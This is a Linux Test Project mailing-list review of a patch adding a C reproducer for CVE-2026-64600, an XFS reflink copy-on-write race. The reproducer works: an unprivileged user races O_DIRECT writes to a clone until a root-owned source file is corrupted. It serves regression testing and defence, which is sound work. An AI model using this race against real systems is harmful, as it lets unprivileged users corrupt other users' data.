Re: [PATCH v4] cve: reproducer for cve-2026-64600
Martin Doucha <[email protected]> Fri, 31 Jul 2026 18:36:53 +0200
| Newsgroups | gmane.linux.ltp |
|---|---|
| Message-ID | <[email protected]> |
Hi, two nits below, otherwise LGTM. Reviewed-by: Martin Doucha <[email protected]> On 7/31/26 16:25, Andrea Cervesato wrote: > From: Andrea Cervesato <andrea.cervesato-IBi9RG/[email protected]> > > Reproducer for CVE-2026-64600 ("RefluXFS"), a race condition in the XFS > reflink copy-on-write path for direct I/O writes. The bug was introduced > in kernel v4.11 by commit 3c68d44a2b49 ("xfs: allocate direct I/O COW > blocks in iomap_begin") and fixed by commit 2f4acd0fcd86 ("xfs: resample > the data fork mapping after cycling ILOCK"). > > Signed-off-by: Andrea Cervesato <andrea.cervesato-IBi9RG/[email protected]> > --- > This reproducer has been created with the usage of Kimi K3 (as analyzer > and writer) and DeepSeek v4 Flash (Max) as reviewer, by taking the > RefluXFS technical paper as input: > https://cdn2.qualys.com/advisory/2026/07/22/RefluXFS.txt > > On bugged kernel: > > tst_test.c:2047: TINFO: LTP version: 20260529-131-gd12a6186b > tst_test.c:2050: TINFO: Tested kernel: 7.2.0-rc1-virtme #21 SMP PREEMPT_DYNAMIC Fri Jul 24 10:20:05 CEST 2026 x86_64 > tst_kconfig.c:90: TINFO: Parsing kernel config '/lib/modules/7.2.0-rc1-virtme/build/.config' > tst_test.c:1875: TINFO: Overall timeout per run is 0h 00m 30s > cve-2026-64600.c:233: TFAIL: round 0: racing O_DIRECT write to the clone succeeded > [ 1.252815] cve-2026-646 > HINT: You _MAY_ be missing kernel fixes: > > https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2f4acd0fcd86 > > HINT: You _MAY_ be vulnerable to CVE(s): > > https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-64600 > > Summary: > passed 0 > failed 1 > broken 0 > skipped 0 > warnings 0 > > On patched kernel: > > tst_test.c:2047: TINFO: LTP version: 20260529-131-gd12a6186b > tst_test.c:2050: TINFO: Tested kernel: 7.2.0-rc1-virtme #20 SMP PREEMPT_DYNAMIC Fri Jul 24 10:08:53 CEST 2026 x86_64 > tst_kconfig.c:90: TINFO: Parsing kernel config '/lib/modules/7.2.0-rc1-virtme/build/.config' > tst_test.c:1875: TINFO: Overall timeout per run is 0h 00m 30s > [ 1.665909] clocksource: Watchdog remote CPU 2 read timed out > [ 8.099229] cve-2026-64600 (249) used greatest stack depth: 12216 bytes left > cve-2026-64600.c:242: TPASS: Source file survived racing O_DIRECT writers > > Summary: > passed 1 > failed 0 > broken 0 > skipped 0 > warnings 0 > --- > Changes in v4: > - remove pressure thread > - move cve before memory leaking CVEs > - Link to v3: https://lore.kernel.org/20260731-cve-2026-64600-v3-1-192da4ddf707-IBi9RG/[email protected] > > Changes in v3: > - use fuzzy loop > - get blksize from stat() > - remove cleanup sentence in the description > - Link to v2: https://lore.kernel.org/20260724-cve-2026-64600-v2-1-c039960448f6-IBi9RG/[email protected] > > Changes in v2: > - rename refluxfs.c > - ensure reflink=1 for mkfs.xfs > - remove root restore > - Link to v1: https://lore.kernel.org/20260724-cve-2026-64600-v1-1-8fa214385d2e-IBi9RG/[email protected] > --- > runtest/cve | 1 + > testcases/cve/.gitignore | 1 + > testcases/cve/refluxfs.c | 228 +++++++++++++++++++++++++++++++++++++++++++++++ > 3 files changed, 230 insertions(+) > > diff --git a/runtest/cve b/runtest/cve > index 99d84270b6efc9afae5bd27adee704603c3092f7..426b203e9ce25992386923c5543e33256caf5d03 100644 > --- a/runtest/cve > +++ b/runtest/cve > @@ -89,6 +89,7 @@ cve-2023-0461 setsockopt10 > cve-2023-31248 nft02 > cve-2023-52879 fanotify25 > cve-2026-53362 setsockopt11 > +cve-2026-64600 refluxfs > # Tests below may cause kernel memory leak > cve-2020-25704 perf_event_open03 > cve-2022-0185 fsconfig03 > diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore > index bc1af0dd2c8086e4f5f78a3b15b91fafbd8f5936..5aa038cd5871424967035b39bd3945a038ad13b8 100644 > --- a/testcases/cve/.gitignore > +++ b/testcases/cve/.gitignore > @@ -16,3 +16,4 @@ tcindex01 > cve-2025-38236 > cve-2025-21756 > cve-2026-46331 > +refluxfs > diff --git a/testcases/cve/refluxfs.c b/testcases/cve/refluxfs.c > new file mode 100644 > index 0000000000000000000000000000000000000000..c448947ca5bcd1602d18545c20e0b40f9a3c035a > --- /dev/null > +++ b/testcases/cve/refluxfs.c > @@ -0,0 +1,228 @@ > +// SPDX-License-Identifier: GPL-2.0-or-later > +/* > + * Copyright (C) 2026 SUSE LLC Andrea Cervesato <andrea.cervesato-IBi9RG/[email protected]> > + */ > + > +/*\ > + * Reproducer for CVE-2026-64600 ("RefluXFS"), a race condition in the XFS > + * reflink copy-on-write path for direct I/O writes. The bug was introduced > + * in kernel v4.11 by commit 3c68d44a2b49 ("xfs: allocate direct I/O COW > + * blocks in iomap_begin") and fixed by commit 2f4acd0fcd86 ("xfs: resample > + * the data fork mapping after cycling ILOCK"). > + * > + * When an :manpage:`ioctl(2)` FICLONE clone is written via ``O_DIRECT``, > + * ``xfs_direct_write_iomap_begin()`` samples the clone's data-fork mapping > + * under ILOCK and calls ``xfs_reflink_allocate_cow()``, which drops the > + * ILOCK to allocate a transaction and then re-checks whether the *stale* > + * physical block is still shared. If a second racing ``O_DIRECT`` writer > + * completes a full copy-on-write cycle inside that lock-drop window, the > + * old shared block's refcount drops to one, the first writer takes the > + * "not shared, write in place" branch, and its write is submitted to the > + * physical block that now belongs only to the reflink source file, > + * corrupting it on disk. > + * > + * [Algorithm] > + * > + * - Create a root-owned target file on a reflink-enabled XFS and fill > + * its first block with a known pattern > + * - Drop privileges to the unprivileged user ``nobody`` > + * - Positive control: a single ``O_DIRECT`` write to a fresh clone must > + * be copy-on-written and leave the target untouched > + * - Each round: reflink-clone the target into a scratch clone file and > + * release a barrier of threads, each issuing one block-sized > + * ``O_DIRECT`` :manpage:`pwrite(2)` at offset 0 of the clone > + * - After each round, read back the target's first block bypassing the > + * page cache (``O_DIRECT``): any byte differing from the original > + * pattern means a racing write refluxed into the source file and the > + * kernel is vulnerable > + */ The algorithm description is out of date now since the synchronization is done through the fuzzy sync library instead of a barrier. > + > +#include <pwd.h> > + > +#include "tst_test.h" > +#include "tst_safe_prw.h" > +#include "lapi/ficlone.h" > +#include "tst_fuzzy_sync.h" > + > +#define MNTPOINT "mnt" > +#define WORKDIR MNTPOINT "/work" > +#define TARGET WORKDIR "/target" > +#define CLONE WORKDIR "/clone" > +#define SCRATCH_FMT WORKDIR "/scratch%d" SCRATCH_FMT is never used. > + > +static char *tbuf, *wbuf, *rbuf; > + > +static int target_fd = -1; > +static int target_dio_fd = -1; > +static int clone_fd = -1; > + > +static int blksize; > + > +static struct tst_fzsync_pair pair; > + > +static void *writer_b(void *arg) > +{ > + int fd; > + > + (void)arg; > + > + while (tst_fzsync_run_b(&pair)) { > + tst_fzsync_wait_b(&pair); > + > + fd = SAFE_OPEN(CLONE, O_RDWR | O_DIRECT); > + > + tst_fzsync_start_race_b(&pair); > + SAFE_PWRITE(1, fd, wbuf, blksize, 0); > + tst_fzsync_end_race_b(&pair); > + > + SAFE_CLOSE(fd); > + } > + > + return NULL; > +} > + > +static void drop_privileges(void) > +{ > + struct passwd *pw; > + > + pw = SAFE_GETPWNAM("nobody"); > + SAFE_SETEGID(pw->pw_gid); > + SAFE_SETEUID(pw->pw_uid); > +} > + > +static void setup(void) > +{ > + int probe_fd, probe_dio_fd; > + struct stat sb; > + > + SAFE_STAT(".", &sb); > + blksize = sb.st_blksize; > + > + tbuf = SAFE_MEMALIGN(blksize, blksize); > + wbuf = SAFE_MEMALIGN(blksize, blksize); > + rbuf = SAFE_MEMALIGN(blksize, blksize); > + > + memset(tbuf, 'A', blksize); > + memset(wbuf, 'X', blksize); > + memset(rbuf, 0, blksize); > + > + SAFE_MKDIR(WORKDIR, 0700); > + SAFE_CHMOD(WORKDIR, 0777); > + > + target_fd = SAFE_OPEN(TARGET, O_RDWR | O_CREAT | O_TRUNC, 0644); > + SAFE_WRITE(1, target_fd, tbuf, blksize); > + SAFE_FSYNC(target_fd); > + SAFE_CLOSE(target_fd); > + > + drop_privileges(); > + > + target_fd = SAFE_OPEN(TARGET, O_RDONLY); > + probe_fd = SAFE_OPEN(CLONE, O_RDWR | O_CREAT | O_TRUNC, 0600); > + > + TEST(ioctl(probe_fd, FICLONE, target_fd)); > + if (TST_RET == -1) { > + if (TST_ERR == EOPNOTSUPP || TST_ERR == EINVAL || TST_ERR == ENOSYS) { > + tst_brk(TCONF, "reflink clones not supported: %s", > + tst_strerrno(TST_ERR)); > + } > + > + tst_brk(TBROK | TTERRNO, "ioctl(FICLONE) failed"); > + } > + > + probe_dio_fd = SAFE_OPEN(CLONE, O_RDWR | O_DIRECT); > + SAFE_PWRITE(1, probe_dio_fd, wbuf, blksize, 0); > + SAFE_CLOSE(probe_dio_fd); > + SAFE_CLOSE(probe_fd); > + > + /* The racy write bypasses the target's page cache, so must the read */ > + target_dio_fd = SAFE_OPEN(TARGET, O_RDONLY | O_DIRECT); > + > + SAFE_PREAD(1, target_dio_fd, rbuf, blksize, 0); > + if (memcmp(rbuf, tbuf, blksize)) > + tst_brk(TBROK, "Source file modified by a single O_DIRECT write to the clone"); > + > + tst_fzsync_pair_init(&pair); > +} > + > +static void run(void) > +{ > + int corrupted = 0; > + > + tst_fzsync_pair_reset(&pair, writer_b); > + > + while (tst_fzsync_run_a(&pair)) { > + clone_fd = SAFE_OPEN(CLONE, O_RDWR | O_CREAT | O_TRUNC, 0600); > + > + /* > + * target_fd is O_RDONLY opened as "nobody". FICLONE > + * checks inode permission against our effective UID. > + */ > + SAFE_IOCTL(clone_fd, FICLONE, target_fd); > + SAFE_CLOSE(clone_fd); > + > + clone_fd = SAFE_OPEN(CLONE, O_RDWR | O_DIRECT); > + > + tst_fzsync_wait_a(&pair); > + > + tst_fzsync_start_race_a(&pair); > + SAFE_PWRITE(1, clone_fd, wbuf, blksize, 0); > + tst_fzsync_end_race_a(&pair); > + > + SAFE_PREAD(1, target_dio_fd, rbuf, blksize, 0); > + SAFE_CLOSE(clone_fd); > + > + if (memcmp(rbuf, tbuf, blksize)) { > + tst_res(TFAIL, "racing O_DIRECT write to the clone succeeded at loop %d", pair.exec_loop); > + corrupted = 1; > + break; > + } > + } > + > + if (!corrupted) > + tst_res(TPASS, "Source file survived racing O_DIRECT writers"); > +} > + > +static void cleanup(void) > +{ > + tst_fzsync_pair_cleanup(&pair); > + > + if (target_dio_fd != -1) > + SAFE_CLOSE(target_dio_fd); > + > + if (target_fd != -1) > + SAFE_CLOSE(target_fd); > + > + if (clone_fd != -1) > + SAFE_CLOSE(clone_fd); > + > + free(tbuf); > + free(wbuf); > + free(rbuf); > +} > + > +static struct tst_test test = { > + .test_all = run, > + .setup = setup, > + .cleanup = cleanup, > + .runtime = 180, > + .needs_root = 1, > + .mount_device = 1, > + .mntpoint = MNTPOINT, > + .filesystems = (struct tst_fs []) { > + { > + .type = "xfs", > + .min_kver = "4.16", > + .mkfs_ver = "mkfs.xfs >= 1.5.0", > + .mkfs_opts = (const char *const []) { > + "-m", "reflink=1", > + NULL > + }, > + }, > + {} > + }, > + .tags = (const struct tst_tag[]) { > + {"linux-git", "2f4acd0fcd86"}, > + {"CVE", "2026-64600"}, > + {} > + }, > +}; > > --- > base-commit: 2a002a2c7b0a5433f22d2684c50a60ed12ccff70 > change-id: 20260724-cve-2026-64600-53fd6d627d63 > > Best regards, -- Martin Doucha [email protected] SW Quality Engineer SUSE LINUX, s.r.o. CORSO IIa Krizikova 148/34 186 00 Prague 8 Czech Republic -- Mailing list info: https://lists.linux.it/listinfo/ltp